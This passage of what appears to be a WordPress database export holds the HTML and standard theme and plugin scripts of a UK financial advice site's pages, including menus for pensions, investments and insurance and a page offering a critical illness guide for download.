<a href=\"../5-powerful-reasons-review-critical-illness-insurance/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../5-powerful-reasons-review-critical-illness-insurance/\">5 Powerful Reasons To Review Your Critical illness Insurance</a>&#13;\n									<div class=\"meta\">&#13;\n										February 20th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../seven-deadly-investment-sins/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n									<div class=\"meta\">&#13;\n										February 10th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../mortgage-strategic-alliance/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n									<div class=\"meta\">&#13;\n										February 5th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n														<li>&#13;\n																<div class=\"image\">&#13;\n									<a href=\"../esmart-money-januaryfebruary-2014-issue/\">&#13;\n																			</a>&#13;\n								</div>&#13;\n																<div class=\"post-holder\">&#13;\n									<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n									<div class=\"meta\">&#13;\n										January 7th, 2017									</div>&#13;\n								</div>&#13;\n							</li>&#13;\n													</ul></div>&#13;\n														</div>&#13;\n			</div>&#13;\n		</div>&#13;\n		</div><div id=\"categories-3\" class=\"widget widget_categories\"><div class=\"heading\"><p>Post Categories</p></div><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (1)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (5)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"1\">Wealth Management  (8)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\n	var dropdown = document.getElementById(\"cat\");\r\n	function onCatChange() {\r\n		if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></div><div id=\"social_links-widget-2\" class=\"widget social_links\"><div class=\"heading\"><p>Get Social</p></div>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"../feed/\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul></div>	</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a>&#13;\n							<span class=\"post-date\">February 26, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../5-powerful-reasons-review-critical-illness-insurance/\">5 Powerful Reasons To Review Your Critical illness Insurance</a>&#13;\n							<span class=\"post-date\">February 20, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"../esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>Established for over 20 years we work with individuals, families and owner managed businesses countrywide, helping them organise; plan; protect and achieve the future they choose, through \"hands on\" objective and realistic financial advice.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n										<a href=\"../portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n								<a href=\"../portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n								<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"../feed/\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><link rel=\"stylesheet\" id=\"js_composer_front-css\" href=\"../wp-content/plugins/js_composer/assets/css/js_composer_front.css\" type=\"text/css\" media=\"screen\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinte_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/main.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js_composer_front.js\"/></body>','&#13;	Can I Sell My Pension Under 55?','A message of importance to anyone really serious about releasing cash from their pension. It is illegal to take money out of a pension fund before age 55.','publish','closed','closed','','can-i-sell-my-pension-under-55','','','2017-09-21 17:35:12','2017-09-21 17:35:12','',0,'http://www.equalitywalk.org.uk/can-i-sell-my-pension-under-55',0,'post','',0),(59,1,'2017-09-21 16:34:28','2017-09-21 16:34:28','<body class=\"single single-avada_portfolio postid-7055 light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		<div class=\"header-social\">&#13;\n		<div class=\"avada-row\">&#13;\n			<div class=\"alignleft\">&#13;\n				<div class=\"top-menu\">&#13;\n	<ul id=\"snav\" class=\"menu\"><li id=\"menu-item-4739\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4739\"><a href=\"/\">Home</a></li>&#13;\n<li id=\"menu-item-6142\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-6142\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n<li id=\"menu-item-4746\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4746\"><a href=\"/contact-us\">Contact</a></li>&#13;\n			</ul><div class=\"mobile-topnav-holder\"/>&#13;\n	</div>			</div>&#13;\n			<div class=\"alignright\">&#13;\n				<div class=\"header-info\">CALL US FREE ON <big><big><b/></big></big><span class=\"sep\">|</span><a href=\"mailto:Enquiries@equalitywalk.org.uk\">Enquiries@equalitywalk.org.uk</a></div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"/wealth-management\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"/wealth-platform\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"/pensions\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"/pensions/pension-review\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"/pensions/sipps\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"/pensions/pension-release\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"/pensions/pension-transfer\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"/tracking-down-your-lost-pension\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"/pensions/income-drawdown\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"/best-annuity-rates\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"/better-pension-drawdown-annuity\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"/pensions/auto-enrolment-pensions\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"/auto-enrolment-report\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"/pensions/group-pension-plan\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-3 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-47\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-47 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\"><a href=\"/investments\">Investments</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-121\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-121\"><a href=\"isas\"><span class=\"fusion-megamenu-bullet\"/>ISAs</a></li>&#13;\n		<li id=\"menu-item-118\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-118\"><a href=\"lump-sum-investment\"><span class=\"fusion-megamenu-bullet\"/>Lump Sum Investment</a></li>&#13;\n		<li id=\"menu-item-102\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-102\"><a href=\"offshore-bonds\"><span class=\"fusion-megamenu-bullet\"/>Offshore Bonds</a></li>&#13;\n		<li id=\"menu-item-124\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-124\"><a href=\"unit-trusts-oeics\"><span class=\"fusion-megamenu-bullet\"/>Unit Trusts &amp; OEICs</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-46\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-46 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\"><a href=\"/trusts\">Trusts</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-108\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-108\"><a href=\"/asset-protection-trust\"><span class=\"fusion-megamenu-bullet\"/>Asset Protection Trust</a></li>&#13;\n		<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114\"><a href=\"/discretionary-trusts\"><span class=\"fusion-megamenu-bullet\"/>Discretionary Trusts</a></li>&#13;\n		<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115\"><a href=\"/absolute-trusts\"><span class=\"fusion-megamenu-bullet\"/>Absolute Trusts</a></li>&#13;\n		<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143\"><a href=\"/gift-loan-schemes\"><span class=\"fusion-megamenu-bullet\"/>Gift &amp; Loan Trust</a></li>&#13;\n		<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146\"><a href=\"/wills-and-trust\"><span class=\"fusion-megamenu-bullet\"/>Wills and Trust</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535\"><a href=\"/critical-illness-insurance-2-0\"><span class=\"fusion-megamenu-bullet\"/>Critical Illness</a></li>&#13;\n		<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585\"><a href=\"/serious-illness-cover\"><span class=\"fusion-megamenu-bullet\"/>Serious Illness</a></li>&#13;\n		<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633\"><a href=\"/relevant-life-plan\"><span class=\"fusion-megamenu-bullet\"/>Relevant Life Plan</a></li>&#13;\n		<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228\"><a href=\"/life-insurance\"><span class=\"fusion-megamenu-bullet\"/>Life Insurance</a></li>&#13;\n		<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243\"><a href=\"/business-protection-insurance\"><span class=\"fusion-megamenu-bullet\"/>Business Protection</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"/about-us\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"/our-team\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"/about-us/testimonials\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"/terms-of-use\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"/privacy-policy\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"/cookies\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"/category/video-2\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"/pension-reforms-offer-freedom-savers\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"/staging-date-social-advisors\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"/automatic-enrolment\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"/new-individual-savings-accounts-qa\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"/our-blog\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"/category/annuities\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"/category/insurance-protection\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8589\"><a href=\"/category/investments\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"/category/pensions\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"/category/trusts\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"/category/wealth-management\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Critical Illness Guide										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"/portfolio_category/guides\" rel=\"tag\">Guides</a> /  <a href=\"/\" rel=\"tag\">Insurance</a></li><li>Critical Illness Guide</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n			<div id=\"content\" class=\"portfolio-full with-sidebar\" style=\"float:left;\">&#13;\n										<div class=\"single-navigation clearfix\">&#13;\n									<a href=\"/portfolio-items/guide-auto-enrolment\" rel=\"prev\">Previous</a>&#13;\n												<a href=\"/portfolio-items/smart-money-nov-dec\" rel=\"next\">Next</a>&#13;\n					</div>&#13;\n						<div id=\"post-7055\" class=\"post-7055 avada_portfolio type-avada_portfolio status-publish has-post-thumbnail hentry\">&#13;\n									<div class=\"flexslider post-slideshow\">&#13;\n				<ul class=\"slides\"><li>&#13;\n												<a href=\"#\"/>&#13;\n											</li>&#13;\n																			</ul></div>&#13;\n																		<div class=\"project-content\">&#13;\n				<span class=\"entry-title\" style=\"display: none;\">Critical Illness Guide</span>&#13;\n				<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n				<span class=\"updated\" style=\"display: none;\">2017-10-29T12:40:31+00:00</span>&#13;\n				<div class=\"project-description post-content\" style=\"\">&#13;\n										<h3 style=\"\">Project Description&#13;\n										</h3><p><a href=\"http://www.equalitywalk.org.uk/CriticalIllnessGuide.pdf\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'download\',\'http://www.equalitywalk.org.uk/CriticalIllnessGuide.pdf\']);\" target=\"_blank\">Click Here To Download Your Guide For FREE</a>.</p>&#13;\n				</div>&#13;\n								<div class=\"project-info\" style=\"\">&#13;\n					<p>Project Details</p>&#13;\n															<div class=\"project-info-box\">&#13;\n						<h4>Categories:</h4>&#13;\n						<div class=\"project-terms\">&#13;\n							<a href=\"/portfolio_category/guides\" rel=\"tag\">Guides</a><br/><a href=\"/\" rel=\"tag\">Insurance</a>						</div>&#13;\n					</div>&#13;\n																													</div>&#13;\n							</div>&#13;\n			<div class=\"portfolio-sep\"/>&#13;\n						&#13;\n																				</div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\"><div id=\"text-24\" class=\"widget widget_text\">			<div class=\"textwidget\"><center><big><big><big>JOIN OVER 5,000</big></big></big><br/><br/>people who get our best financial wisdom on a weekly basis.</center><br/><a 